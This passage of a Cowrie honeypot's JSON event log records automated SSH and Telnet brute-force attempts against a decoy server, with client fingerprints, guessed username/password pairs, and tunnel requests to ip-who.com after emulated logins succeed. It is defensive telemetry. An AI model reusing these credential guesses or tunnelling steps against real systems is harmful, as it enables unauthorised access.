@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:11:28.610863Z","src_ip":"212.227.235.229","session":"2f67ca673772"}
{"eventid":"cowrie.login.failed","username":"madrid","password":"madrid","message":"login attempt [madrid/madrid] failed","sensor":"my-vps","timestamp":"2025-08-28T08:11:29.371787Z","src_ip":"212.227.235.229","session":"2570dc6aff10"}
{"eventid":"cowrie.login.failed","username":"help","password":"1234","message":"login attempt [help/1234] failed","sensor":"my-vps","timestamp":"2025-08-28T08:11:30.299176Z","src_ip":"212.227.235.229","session":"2f67ca673772"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:11:31.237775Z","src_ip":"212.227.235.229","session":"2570dc6aff10"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:11:31.940921Z","src_ip":"212.227.235.229","session":"2f67ca673772"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51198,"dst_ip":"1.2.3.4","dst_port":22,"session":"47d069a16614","protocol":"ssh","message":"New connection: 212.227.235.229:51198 (1.2.3.4:22) [session: 47d069a16614]","sensor":"my-vps","timestamp":"2025-08-28T08:11:34.995356Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:11:34.998950Z","src_ip":"212.227.235.229","session":"47d069a16614"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51180,"dst_ip":"1.2.3.4","dst_port":22,"session":"0dfcb38f7196","protocol":"ssh","message":"New connection: 212.227.235.229:51180 (1.2.3.4:22) [session: 0dfcb38f7196]","sensor":"my-vps","timestamp":"2025-08-28T08:11:35.832798Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:11:35.915216Z","src_ip":"212.227.235.229","session":"0dfcb38f7196"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:11:36.081147Z","src_ip":"212.227.235.229","session":"0dfcb38f7196"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:11:36.276348Z","src_ip":"212.227.235.229","session":"47d069a16614"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51210,"dst_ip":"1.2.3.4","dst_port":22,"session":"408b2e0d2cf5","protocol":"ssh","message":"New connection: 212.227.235.229:51210 (1.2.3.4:22) [session: 408b2e0d2cf5]","sensor":"my-vps","timestamp":"2025-08-28T08:11:36.791307Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:11:36.809519Z","src_ip":"212.227.235.229","session":"408b2e0d2cf5"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:11:37.062342Z","src_ip":"212.227.235.229","session":"408b2e0d2cf5"}
{"eventid":"cowrie.login.success","username":"root","password":"1234567890%*()","message":"login attempt [root/1234567890%*()] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:11:39.288244Z","src_ip":"212.227.235.229","session":"47d069a16614"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-28T08:11:39.660747Z","session":"47d069a16614"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T08:11:39.940126Z","src_ip":"212.227.235.229","session":"47d069a16614"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:11:40.802333Z","src_ip":"212.227.235.229","session":"47d069a16614"}
{"eventid":"cowrie.login.failed","username":"public","password":"public","message":"login attempt [public/public] failed","sensor":"my-vps","timestamp":"2025-08-28T08:11:43.271332Z","src_ip":"212.227.235.229","session":"408b2e0d2cf5"}
{"eventid":"cowrie.session.closed","duration":"9.7","message":"Connection lost after 9.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:11:46.466815Z","src_ip":"212.227.235.229","session":"408b2e0d2cf5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49676,"dst_ip":"1.2.3.4","dst_port":23,"session":"0f814514a96a","protocol":"telnet","message":"New connection: 212.227.125.160:49676 (1.2.3.4:23) [session: 0f814514a96a]","sensor":"my-vps","timestamp":"2025-08-28T08:11:50.904510Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51064,"dst_ip":"1.2.3.4","dst_port":22,"session":"16185c0c26f9","protocol":"ssh","message":"New connection: 212.227.235.229:51064 (1.2.3.4:22) [session: 16185c0c26f9]","sensor":"my-vps","timestamp":"2025-08-28T08:11:56.436963Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:11:56.584838Z","src_ip":"212.227.235.229","session":"16185c0c26f9"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:11:56.701058Z","src_ip":"212.227.235.229","session":"16185c0c26f9"}
{"eventid":"cowrie.login.success","username":"root","password":"111111","message":"login attempt [root/111111] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:11:59.089246Z","src_ip":"212.227.235.229","session":"16185c0c26f9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-28T08:11:59.477454Z","session":"16185c0c26f9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T08:11:59.745313Z","src_ip":"212.227.235.229","session":"16185c0c26f9"}
{"eventid":"cowrie.login.failed","username":"sales","password":"sales","message":"login attempt [sales/sales] failed","sensor":"my-vps","timestamp":"2025-08-28T08:11:59.977708Z","src_ip":"212.227.235.229","session":"0dfcb38f7196"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:12:00.242946Z","src_ip":"212.227.235.229","session":"16185c0c26f9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60630,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b784bed530a","protocol":"ssh","message":"New connection: 212.227.235.229:60630 (1.2.3.4:22) [session: 7b784bed530a]","sensor":"my-vps","timestamp":"2025-08-28T08:12:01.057874Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:12:01.064036Z","src_ip":"212.227.235.229","session":"7b784bed530a"}
{"eventid":"cowrie.session.closed","duration":"25.5","message":"Connection lost after 25.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:12:01.340569Z","src_ip":"212.227.235.229","session":"0dfcb38f7196"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:12:01.395200Z","src_ip":"212.227.235.229","session":"7b784bed530a"}
{"eventid":"cowrie.login.failed","username":"pizza","password":"pizza","message":"login attempt [pizza/pizza] failed","sensor":"my-vps","timestamp":"2025-08-28T08:12:02.767453Z","src_ip":"212.227.235.229","session":"7b784bed530a"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:12:04.122127Z","src_ip":"212.227.235.229","session":"7b784bed530a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36286,"dst_ip":"1.2.3.4","dst_port":22,"session":"0725d0a21168","protocol":"ssh","message":"New connection: 212.227.235.229:36286 (1.2.3.4:22) [session: 0725d0a21168]","sensor":"my-vps","timestamp":"2025-08-28T08:12:09.117229Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:12:09.238108Z","src_ip":"212.227.235.229","session":"0725d0a21168"}
